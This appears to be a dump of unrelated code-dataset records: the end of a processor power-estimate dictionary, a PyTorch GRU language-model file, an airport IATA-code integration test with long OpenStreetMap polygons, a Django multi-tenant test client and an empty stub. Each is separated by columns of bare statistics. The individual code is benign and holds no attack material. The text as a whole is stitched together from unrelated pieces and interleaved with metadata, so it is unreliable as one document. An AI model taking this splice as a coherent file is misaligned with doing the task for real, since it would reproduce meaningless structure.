'Memory Management Unit/Dtlb/Peak Dynamic': 0.0481,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0486382,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.217554,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0337738,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.45629,
'Memory Management Unit/Runtime Dynamic': 0.082412,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.4565,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0172167,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00853193,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0942385,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.119987,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.48195,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.5995855135814714,
'Runtime Dynamic': 3.5995855135814714,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.241052,
'Runtime Dynamic': 0.0794812,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 76.8249,
'Peak Power': 109.937,
'Runtime Dynamic': 16.6309,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 76.5838,
'Total Cores/Runtime Dynamic': 16.5514,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.241052,
'Total L3s/Runtime Dynamic': 0.0794812,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.073304
| 124
| 0.68212
| 8,082
| 68,617
| 5.785325
| 0.067434
| 0.123532
| 0.112924
| 0.093419
| 0.939175
| 0.931304
| 0.917916
| 0.88714
| 0.862908
| 0.842355
| 0
| 0.132078
| 0.224303
| 68,617
| 914
| 125
| 75.073304
| 0.746383
| 0
| 0
| 0.642232
| 0
| 0
| 0.657335
| 0.048092
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b30da312fb88667e9bbf1949fc2e027655f94913
| 4,951
|
py
|
Python
|
RNN.py
|
chunkitmax/7ca0a1e5281409b27ab971d31707fe90
|
3aa47240aa5383c6036eb3a5cb63b33838287c83
|
[
"MIT"
] | null | null | null |
RNN.py
|
chunkitmax/7ca0a1e5281409b27ab971d31707fe90
|
3aa47240aa5383c6036eb3a5cb63b33838287c83
|
[
"MIT"
] | null | null | null |
RNN.py
|
chunkitmax/7ca0a1e5281409b27ab971d31707fe90
|
3aa47240aa5383c6036eb3a5cb63b33838287c83
|
[
"MIT"
] | null | null | null |
'''
RNN.py
define RNN models
'''
import torch as T
from dataloader import DataManager
class RNN_M2M(T.nn.Module):
def __init__(self, word_list_len, embedding_len, hidden_size=50, lr=0.01,
num_layers=3, drop_rate=0., use_cuda=False, use_adam=True,
use_rmsprop=False, pretrained_emb=None):
super(RNN_M2M, self).__init__()
self.word_list_len = word_list_len
self.embedding_len = embedding_len
self.hidden_size = hidden_size
self.lr = lr
self.num_layers = num_layers
self.drop_rate = drop_rate
self.use_cuda = use_cuda
self.use_adam = use_adam
self.use_rmsprop = use_rmsprop
self.pretrained_emb = pretrained_emb
self._build_model()
def _build_model(self):
if self.pretrained_emb is not None:
self.Embedding = T.nn.Embedding(*self.pretrained_emb.shape, padding_idx=0)
self.Embedding.weight = T.nn.Parameter(self.pretrained_emb)
self.Embedding.weight.requires_grad = False
else:
self.Embedding = T.nn.Embedding(self.word_list_len, self.embedding_len, padding_idx=0,
scale_grad_by_freq=True)
self.RNN = T.nn.GRU(input_size=self.embedding_len, hidden_size=self.hidden_size,
num_layers=self.num_layers, batch_first=True, dropout=self.drop_rate)
self.Fc = T.nn.Linear(self.hidden_size, self.word_list_len)
self.Loss = T.nn.CrossEntropyLoss()
if self.use_cuda:
self.cuda()
if self.use_adam:
self.optimizer = T.optim.Adam(filter(lambda p: p.requires_grad, self.parameters()),
lr=self.lr)
elif self.use_rmsprop:
self.optimizer = T.optim.RMSprop(filter(lambda p: p.requires_grad, self.parameters()),
lr=self.lr)
else:
self.optimizer = T.optim.SGD(filter(lambda p: p.requires_grad, self.parameters()),
lr=self.lr, momentum=0.9, nesterov=True)
def forward(self, inputs, hidden_state=None, return_states=False):
embeddings = self.Embedding(inputs)
if hidden_state is not None:
output, state = self.RNN(embeddings, hidden_state)
else:
output, state = self.RNN(embeddings)
output = self.Fc(output)
_, max_indice = T.max(output, dim=2)
if return_states:
return output, max_indice, state
return output, max_indice
def get_loss(self):
return self.Loss
def get_optimizer(self):
return self.optimizer
class RNN_M2O(T.nn.Module):
def __init__(self, word_list_len, embedding_len, hidden_size=50, lr=0.01,
num_layers=3, drop_rate=0., use_cuda=False, use_adam=True,
use_rmsprop=False, pretrained_emb=None):
super(RNN_M2O, self).__init__()
self.word_list_len = word_list_len
self.embedding_len = embedding_len
self.hidden_size = hidden_size
self.lr = lr
self.num_layers = num_layers
self.drop_rate = drop_rate
self.use_cuda = use_cuda
self.use_adam = use_adam
self.use_rmsprop = use_rmsprop
self.pretrained_emb = pretrained_emb
self._build_model()
def _build_model(self):
if self.pretrained_emb is not None:
self.Embedding = T.nn.Embedding(*self.pretrained_emb.shape, padding_idx=0)
self.Embedding.weight = T.nn.Parameter(self.pretrained_emb)
self.Embedding.weight.requires_grad = False
else:
self.Embedding = T.nn.Embedding(self.word_list_len, self.embedding_len, padding_idx=0,
scale_grad_by_freq=True)
self.RNN = T.nn.GRU(input_size=self.embedding_len, hidden_size=self.hidden_size,
num_layers=self.num_layers, batch_first=True, dropout=self.drop_rate)
self.Fc = T.nn.Linear(self.hidden_size, self.word_list_len)
self.Loss = T.nn.CrossEntropyLoss()
if self.use_cuda:
self.cuda()
if self.use_adam:
self.optimizer = T.optim.Adam(filter(lambda p: p.requires_grad, self.parameters()),
lr=self.lr)
elif self.use_rmsprop:
self.optimizer = T.optim.RMSprop(filter(lambda p: p.requires_grad, self.parameters()),
lr=self.lr)
else:
self.optimizer = T.optim.SGD(filter(lambda p: p.requires_grad, self.parameters()),
lr=self.lr, momentum=0.9, nesterov=True)
def forward(self, inputs, hidden_state=None, return_states=False):
embeddings = self.Embedding(inputs)
if hidden_state is not None:
output, state = self.RNN(embeddings, hidden_state)
else:
output, state = self.RNN(embeddings)
output = output.narrow(1, inputs.size(1)-1, 1).view(-1, self.hidden_size)
output = self.Fc(output)
_, max_indice = T.max(output, dim=1)
if return_states:
return output, max_indice, state
return output, max_indice
def get_loss(self):
return self.Loss
def get_optimizer(self):
return self.optimizer
| 39.608
| 93
| 0.661886
| 701
| 4,951
| 4.433666
| 0.135521
| 0.066924
| 0.035393
| 0.03861
| 0.954955
| 0.954955
| 0.954955
| 0.954955
| 0.954955
| 0.954955
| 0
| 0.008698
| 0.23369
| 4,951
| 124
| 94
| 39.927419
| 0.81049
| 0.004848
| 0
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09009
| false
| 0
| 0.018018
| 0.036036
| 0.198198
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b353306056576c6c6a208d3d5554fbbf3172ada5
| 15,714
|
py
|
Python
|
integration-test/398-airport-iata-codes.py
|
roman-ianivskyy/vector-datasource
|
3d59c0d9856d6bc2a78c4a9273b4e850c2e41d92
|
[
"MIT"
] | null | null | null |
integration-test/398-airport-iata-codes.py
|
roman-ianivskyy/vector-datasource
|
3d59c0d9856d6bc2a78c4a9273b4e850c2e41d92
|
[
"MIT"
] | null | null | null |
integration-test/398-airport-iata-codes.py
|
roman-ianivskyy/vector-datasource
|
3d59c0d9856d6bc2a78c4a9273b4e850c2e41d92
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
import dsl
from shapely.wkt import loads as wkt_loads
from . import FixtureTest
class AirportIataCodes(FixtureTest):
def test_sfo(self):
# San Francisco International
self.generate_fixtures(dsl.way(23718192, wkt_loads('POLYGON ((-122.402782773269 37.63531941394439, -122.40266823807 37.63591797330289, -122.402642995411 37.63627586880459, -122.400825793423 37.63777992163308, -122.400541476635 37.6380545077576, -122.400242517309 37.63819677996181, -122.399856241737 37.6383059736938, -122.399504910629 37.6383616019698, -122.398018917486 37.63836757738308, -122.397126531083 37.63836700829618, -122.396226059842 37.6386334827911, -122.395922968265 37.63869978115548, -122.395041092151 37.6386999945622, -122.394648708034 37.63862437743169, -122.394254167962 37.63858532396358, -122.392438313446 37.63858546623489, -122.391235918439 37.6385816960447, -122.390817393348 37.63864899035377, -122.389157396534 37.63901967704601, -122.388567922045 37.6391058929143, -122.388302919036 37.63913456037959, -122.388062529866 37.6390834141992, -122.387878285401 37.63897038030411, -122.387772913018 37.63880221628041, -122.387668528782 37.63847058205218, -122.387559113981 37.63819279634378, -122.386109861933 37.6361934199638, -122.385986523244 37.63597168263642, -122.385954633052 37.63578217032489, -122.385994338587 37.63559571648658, -122.386109592438 37.63542768710219, -122.386339022162 37.63525887481049, -122.386630794966 37.63517770534189, -122.387070430466 37.6351242088515, -122.387272910731 37.63505619995949, -122.38816152421 37.63456149742279, -122.388740129085 37.63412156936317, -122.389776874754 37.63391569010429, -122.391048170544 37.6335037164537, -122.391386206586 37.6332148142114, -122.391498765491 37.6329047108011, -122.391448819161 37.63268018914851, -122.3909392049 37.63174545752518, -122.392199810738 37.63131220020119, -122.391559311941 37.62998359980139, -122.391427439257 37.6298805122232, -122.388171226015 37.62852100917631, -122.387996773187 37.62878630951541, -122.385765178358 37.62809285554551, -122.379756976244 37.63013221925351, -122.37423197792 37.62792552065459, -122.372338688627 37.62743632006278, -122.371877763055 37.62812010434631, -122.368255665998 37.62669262369908, -122.36714849241 37.62843961891189, -122.365768141145 37.62789087260929, -122.365253136992 37.62676932017637, -122.368741924061 37.62124049667588, -122.367821330558 37.62020429901018, -122.367308033205 37.62043946015379, -122.366929483144 37.62051801305999, -122.366536470207 37.6205380781912, -122.366328240724 37.62050271517259, -122.365617314008 37.62026477925429, -122.365174444573 37.61998422165949, -122.365064221288 37.61986567988729, -122.364742714248 37.61903317832368, -122.364662584524 37.6189115042374, -122.364569519061 37.61884938633769, -122.355255426869 37.61492880935528, -122.355170895401 37.61486868056239, -122.355135142453 37.61479915880869, -122.355136310262 37.6147250116876, -122.355179609059 37.6146547070554, -122.358802963758 37.60916860603569, -122.366974758234 37.6124694664738, -122.367632684348 37.61287835449848, -122.368775431221 37.61338750447399, -122.371457171839 37.61520340875107, -122.378584674798 37.60572142198278, -122.378192021187 37.6052981187722, -122.378828297903 37.60493409601148, -122.381680808256 37.60455576665628, -122.381876820651 37.6044554905509, -122.382042290326 37.60436631658349, -122.382557923299 37.60463568853699, -122.383020825165 37.60492406134129, -122.383427672157 37.60520289656819, -122.384410159584 37.60584226364769, -122.384490109644 37.60594787540128, -122.385525687504 37.60664039727529, -122.385564943881 37.6070947211435, -122.385595486601 37.60767436434308, -122.386246405856 37.6079477807216, -122.386327703389 37.6078152002346, -122.386698707602 37.60797396943178, -122.386608516747 37.60810868458069, -122.386847468613 37.60820916925559, -122.386492364581 37.608780264068, -122.385977719755 37.6085681233169, -122.385745145927 37.60891967458439, -122.385749727335 37.60929072304688, -122.385947895687 37.60937825434759, -122.385847913196 37.6095336043617, -122.386355281668 37.60975648801139, -122.386575818071 37.60953737602549, -122.386752606519 37.60946372180269, -122.386992366868 37.60946770696059, -122.387235361152 37.6095741675278, -122.387984825594 37.60966746272569, -122.388313608988 37.60994386062659, -122.389838229688 37.6095805722362, -122.391743107248 37.6107278601031, -122.392167740883 37.61101065864849, -122.392897172894 37.6129271704265, -122.393137831558 37.6133756207896, -122.393493025421 37.61333456157809, -122.393827737696 37.61327258133899, -122.394060760681 37.61321415904558, -122.394076032041 37.61315096898599, -122.394739078552 37.61303611664558, -122.394902661765 37.61344201284619, -122.39614071989 37.61453935892668, -122.39703409444 37.61493919846718, -122.397241874765 37.6151045701634, -122.397419561528 37.61531825774418, -122.39777170112 37.61584418416938, -122.398200017847 37.61692939821548, -122.398558984635 37.61787840495269, -122.399218258222 37.61967776304128, -122.399837826273 37.6214926598776, -122.400493416768 37.62341132060519, -122.401401433857 37.62610950021288, -122.401612807443 37.62729530789251, -122.401933865326 37.62929079730368, -122.40191239559 37.6295417237437, -122.401836038791 37.629813423405, -122.401691859188 37.63007658481649, -122.400390469836 37.6320202082337, -122.400645860871 37.63246797430131, -122.401998813521 37.6331083874929, -122.402180632534 37.6332533013763, -122.4022967847 37.63343378528259, -122.402344844568 37.63359136153137, -122.402782773269 37.63531941394439))'), {
u'gnis:county_name': u'San Mateo', u'internet_access:ssid': u'#SFO FREE WIFI', u'wikidata': u'Q8688', u'owner': u'San Francisco Airport Commission', u'name:de': u'Internationaler Flughafen San Francisco', u'is_in': u'San Mateo County', u'addr:housenumber': u'780', u'gnis:feature_type': u'Airport', u'way_area': u'1.24398e+07', u'wikipedia': u'en:San Francisco International Airport', u'addr:state': u'CA', u'ele': u'4', u'source': u'openstreetmap.org', u'gnis:feature_id': u'1653945', u'addr:street': u'S Airport Blvd', u'ref': u'KSFO', u'website': u'http://www.flysfo.com/', u'city_served': u'San Francisco, California', u'name:ja': u'\u30b5\u30f3\u30d5\u30e9\u30f3\u30b7\u30b9\u30b3\u56fd\u969b\u7a7a\u6e2f', u'short_name': u'San Francisco Airport', u'passengers': u'47155100', u'iata': u'SFO', u'aerodrome:type': u'public', u'icao': u'KSFO', u'gnis:created': u'03/01/1994', u'aerodrome': u'international', u'name:el': u'\u0394\u03b9\u03b5\u03b8\u03bd\u03ae\u03c2 \u0391\u03b5\u03c1\u03bf\u03bb\u03b9\u03bc\u03ad\u03bd\u03b1\u03c2 \u03a3\u03b1\u03bd \u03a6\u03c1\u03b1\u03bd\u03c3\u03af\u03c3\u03ba\u03bf', u'name:en': u'San Francisco International Airport', u'name': u'San Francisco International Airport', u'addr:postcode': u'94128', u'addr:city': u'San Francisco', u'internet_access:fee': u'no', u'aeroway': u'aerodrome', u'internet_access': u'wlan', u'is_in:iso_3166_2': u'US-CA', u'source_ref': u'geonames.usgs.gov'}))
self.assert_has_feature(
13, 1311, 3170, 'pois',
{'kind': 'aerodrome', 'iata': 'SFO'})
def test_oak(self):
# Oakland airport
self.generate_fixtures(dsl.way(54363486, wkt_loads('POLYGON ((-122.251293129543 37.72490617803489, -122.251293129543 37.72528631025018, -122.250709404272 37.72582261309319, -122.250271745065 37.7262367743562, -122.250091363356 37.72640651656879, -122.249069978878 37.72646079988989, -122.248855101862 37.72649689401339, -122.248675438806 37.72635479106338, -122.248666635316 37.72625027416969, -122.248469185616 37.7260669607028, -122.248469185616 37.72593807259049, -122.248623695845 37.72582261309319, -122.248752514257 37.72576825825217, -122.249044287061 37.72558501464461, -122.248331923041 37.72504871008109, -122.2479457373 37.7249128570103, -122.247782603245 37.72500117574517, -122.247542303906 37.7250079968177, -122.247327696385 37.72510981546048, -122.247233283448 37.72502838897859, -122.246898481342 37.72512338653218, -122.246718279296 37.72511656547029, -122.245619639704 37.72529988128949, -122.245447971653 37.72529988128949, -122.244804328752 37.72495371243168, -122.24467551034 37.72485182252129, -122.244512376284 37.7248246802761, -122.244323640243 37.72472968233939, -122.244109032722 37.72456668634359, -122.243937364671 37.72443765351368, -122.243646220687 37.72425156447159, -122.239630212378 37.7209887130929, -122.236737188006 37.71960011022599, -122.236621934155 37.71958952257982, -122.236554830003 37.71960011022599, -122.236205385357 37.71989478726049, -122.234797186318 37.72126107288809, -122.233032266279 37.72297109718351, -122.232549601477 37.7234314597321, -122.232078614774 37.72388876410138, -122.231358615074 37.72458778915839, -122.228689900027 37.72721628601359, -122.228556500208 37.72728861560778, -122.228344587632 37.72728229209988, -122.228231759233 37.7272540849852, -122.226920398581 37.7269259011653, -122.226794275115 37.72716768730739, -122.226740645692 37.7271634953123, -122.226721870903 37.72736499501418, -122.226727170963 37.72824956937759, -122.227655579809 37.72842811712219, -122.229165378307 37.72871849608017, -122.229052729571 37.72902819922441, -122.227660610375 37.73160566920351, -122.226756725536 37.73164808395509, -122.226756725536 37.73330060628359, -122.22662530201 37.7335700079751, -122.226531428063 37.73386271123349, -122.226469713803 37.7341723928629, -122.226453633959 37.7345414657444, -122.226445189796 37.73578500402448, -122.22645956284 37.73899030097969, -122.226462706944 37.7396773910561, -122.226480493586 37.74363052145789, -122.223849238287 37.74366227408098, -122.223878703029 37.7449985001975, -122.224981115545 37.74510881537909, -122.224986505437 37.7452614663153, -122.22449297102 37.7453335651822, -122.224001862054 37.74538996562618, -122.223736859045 37.74540999700779, -122.223386875411 37.74543301177997, -122.222657892558 37.74542995735078, -122.222356867106 37.74542399055839, -122.222115938947 37.74539699792041, -122.22201092589 37.7453789554674, -122.221959901582 37.74536496190831, -122.221738916022 37.74532497014858, -122.221533920474 37.74528497836727, -122.221283919331 37.74521600492469, -122.220993943157 37.74511300635818, -122.220868897669 37.74506498766729, -122.22042692655 37.74486396233569, -122.220167942253 37.74472700907621, -122.219941926128 37.74458302319249, -122.219780858197 37.74445601419819, -122.219598859521 37.7443109622726, -122.219506872036 37.74422898862967, -122.219180873419 37.74388901724902, -122.219129938942 37.7438140045485, -122.219053941469 37.743729970344, -122.218955935272 37.74360999234979, -122.218702879856 37.7433220159562, -122.218492943574 37.74306799342191, -122.218350919928 37.74288301673258, -122.218234857593 37.74274698327319, -122.218044863911 37.74250901291288, -122.217887928231 37.74232801285489, -122.217629932081 37.7420009613922, -122.217460869144 37.741798009747, -122.216767908734 37.74091295789887, -122.215603781958 37.73950455355099, -122.214659562762 37.73837829385128, -122.214093713965 37.73765929445129, -122.213559935023 37.73698049748229, -122.213345417333 37.73667501905528, -122.213176444228 37.73639930593229, -122.212881257826 37.73591351978678, -122.212755314023 37.73567595371398, -122.212487077079 37.73509901451231, -122.212256389714 37.73459631145159, -122.211846039293 37.73373291311091, -122.211615262096 37.73327900863718, -122.211462368835 37.73295646408938, -122.211014468834 37.73200615727129, -122.210864270519 37.73174527545498, -122.210687302408 37.73149071586859, -122.210440535199 37.73123395295428, -122.209893371359 37.7307884877894, -122.209311263055 37.73039609257019, -122.208659535317 37.73001421038119, -122.207375124124 37.72930607125718, -122.205283037658 37.72815628102949, -122.20212869337 37.72638278536621, -122.201608389157 37.72624281374678, -122.200337003535 37.72580151063029, -122.199832689335 37.72561059346148, -122.19938748428 37.72538990482221, -122.199671531573 37.72489580430601, -122.199730281393 37.724835054015, -122.199822179046 37.72476115885698, -122.199902668096 37.72467397668627, -122.199995464064 37.72452959653339, -122.200099938132 37.7243327786471, -122.200176025437 37.72413617339889, -122.200230373511 37.7239380044439, -122.20026558747 37.7236803626934, -122.200231631153 37.72315278405669, -122.200230014185 37.72269810418028, -122.200249597458 37.72236002347581, -122.200313557507 37.72196459925629, -122.200420636688 37.72159105821197, -122.200535261719 37.72123890327881, -122.20072579439 37.72080268644267, -122.200918842345 37.7204400112942, -122.201175940179 37.72006447294958, -122.201490260697 37.7196851666305, -122.201784099627 37.7193575177389, -122.202200917919 37.71896406713338, -122.202626809195 37.71857871516488, -122.202868905164 37.7183700856397, -122.202909419183 37.71816571909098, -122.203313481398 37.71785959456909, -122.20244256473 37.71708177109411, -122.202021973514 37.71674920749609, -122.201678727244 37.71650106291599, -122.201399710517 37.71624225831889, -122.201104703777 37.7159580127994, -122.200854702634 37.7156763954754, -122.200552060215 37.71538930530248, -122.200210969901 37.71511280230468, -122.199884791621 37.71485477454648, -122.199507229708 37.7144473716878, -122.200841766894 37.71374277903888, -122.200927645835 37.7136578579394, -122.200970585305 37.7135475669603, -122.200976604018 37.7134330119809, -122.200948217255 37.71330658912748, -122.202133723935 37.71302645407658, -122.204107771772 37.71257242269488, -122.20510562039 37.712349563262, -122.205883471594 37.71216500728681, -122.206845746927 37.71190796417878, -122.206905844219 37.71185367019291, -122.207086046265 37.71180619845529, -122.207163211548 37.71183327440519, -122.20728089085 37.7118383200536, -122.208766794162 37.71149450452489, -122.209276408422 37.7113692864847, -122.209703826835 37.7112697230678, -122.209849803068 37.71120860627168, -122.210004223466 37.71108637252841, -122.210313243923 37.71080800574517, -122.210699519495 37.71041415440249, -122.211128644707 37.70999315328689, -122.211440988931 37.7097396560193, -122.211824479726 37.7093514133591, -122.211969377981 37.70919222119888, -122.211996237608 37.70905221709679, -122.211170146873 37.70203241348079, -122.211172841819 37.7019283597972, -122.211215691458 37.7018370994791, -122.212551396454 37.700546791649, -122.212803643385 37.70028160551789, -122.21358679465 37.69954937129089, -122.213712828285 37.69945178216058, -122.2139094695 37.6992977573942, -122.214029664085 37.69926385342248, -122.214167016492 37.69927067686459, -122.215772126242 37.6995422635655, -122.216407235148 37.6996441882836, -122.216730718482 37.6997436962414, -122.21699572149 37.6998624659219, -122.231144277047 37.70987098860599, -122.244036898004 37.71908799328549, -122.249210924546 37.72267501128519, -122.250975485259 37.7240642670484, -122.251198626776 37.72428837020699, -122.251258724068 37.7244648669541, -122.251293129543 37.72490617803489))'), {
u'gnis:county_name': u'Alameda', u'source_ref': u'geonames.usgs.gov', u'iata': u'OAK', u'name:ja': u'\u30aa\u30fc\u30af\u30e9\u30f3\u30c9\u56fd\u969b\u7a7a\u6e2f', u'gnis:feature_type': u'Airport', u'way_area': u'1.54832e+07', u'wikipedia': u'en:Oakland International Airport', u'addr:state': u'CA', u'ele': u'2', u'icao': u'KOAK', u'source': u'openstreetmap.org', u'aeroway': u'aerodrome', u'wikidata': u'Q1165584', u'gnis:created': u'03/01/1994', u'gnis:feature_id': u'1653772', u'aerodrome': u'international', u'name': u'Metropolitan Oakland International Airport'}))
self.assert_has_feature(
13, 1314, 3167, 'pois',
{'kind': 'aerodrome', 'iata': 'OAK'})
| 604.384615
| 7,766
| 0.80826
| 1,849
| 15,714
| 6.852893
| 0.464035
| 0.008523
| 0.006156
| 0.007576
| 0.05485
| 0.034015
| 0.018941
| 0.014837
| 0.011365
| 0.011365
| 0
| 0.760197
| 0.068538
| 15,714
| 25
| 7,767
| 628.56
| 0.105486
| 0.004264
| 0
| 0.125
| 0
| 0.25
| 0.92917
| 0.018794
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.125
| false
| 0.0625
| 0.1875
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b36c1bb7be7c6d9aa8d8387d73d715c1cfbc22b6
| 2,560
|
py
|
Python
|
django_pgschemas/test/client.py
|
randlet/django-pgschemas
|
97c5a059362eae49982c4a219db6fca6bde77b28
|
[
"MIT"
] | null | null | null |
django_pgschemas/test/client.py
|
randlet/django-pgschemas
|
97c5a059362eae49982c4a219db6fca6bde77b28
|
[
"MIT"
] | null | null | null |
django_pgschemas/test/client.py
|
randlet/django-pgschemas
|
97c5a059362eae49982c4a219db6fca6bde77b28
|
[
"MIT"
] | null | null | null |
from django.test import RequestFactory, Client
from ..middleware import TenantMiddleware
class TenantRequestFactory(RequestFactory):
def __init__(self, tenant, **defaults):
super().__init__(**defaults)
self.tenant = tenant
def get(self, path, data={}, **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().get(path, data, **extra)
def post(self, path, data={}, **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().post(path, data, **extra)
def patch(self, path, data={}, **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().patch(path, data, **extra)
def put(self, path, data={}, **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().put(path, data, **extra)
def delete(self, path, data="", content_type="application/octet-stream", **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().delete(path, data, **extra)
class TenantClient(Client):
def __init__(self, tenant, enforce_csrf_checks=False, **defaults):
super().__init__(enforce_csrf_checks, **defaults)
self.tenant = tenant
def get(self, path, data={}, **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().get(path, data, **extra)
def post(self, path, data={}, **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().post(path, data, **extra)
def patch(self, path, data={}, **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().patch(path, data, **extra)
def put(self, path, data={}, **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().put(path, data, **extra)
def delete(self, path, data="", content_type="application/octet-stream", **extra):
if "HTTP_HOST" not in extra:
extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
return super().delete(path, data, **extra)
| 38.787879
| 86
| 0.623047
| 325
| 2,560
| 4.716923
| 0.129231
| 0.104371
| 0.152642
| 0.097847
| 0.840183
| 0.840183
| 0.840183
| 0.840183
| 0.840183
| 0.840183
| 0
| 0
| 0.225781
| 2,560
| 65
| 87
| 39.384615
| 0.773461
| 0
| 0
| 0.84
| 0
| 0
| 0.089063
| 0.01875
| 0
| 0
| 0
| 0
| 0
| 1
| 0.24
| false
| 0
| 0.04
| 0
| 0.52
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
2fcb517cdbf99a8724c86211f3c6e82b1644050e
| 12
|
py
|
Python
|
_draft/answers/x_9_7.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | null | null | null |
_draft/answers/x_9_7.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | 1
|
2021-11-13T08:03:04.000Z
|
2021-11-13T08:03:04.000Z
|
_draft/answers/x_9_7.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | null | null | null |
# x_9_7
#
#
| 3
| 7
| 0.416667
| 3
| 12
| 1
| 1
| 0
| 0
| 0
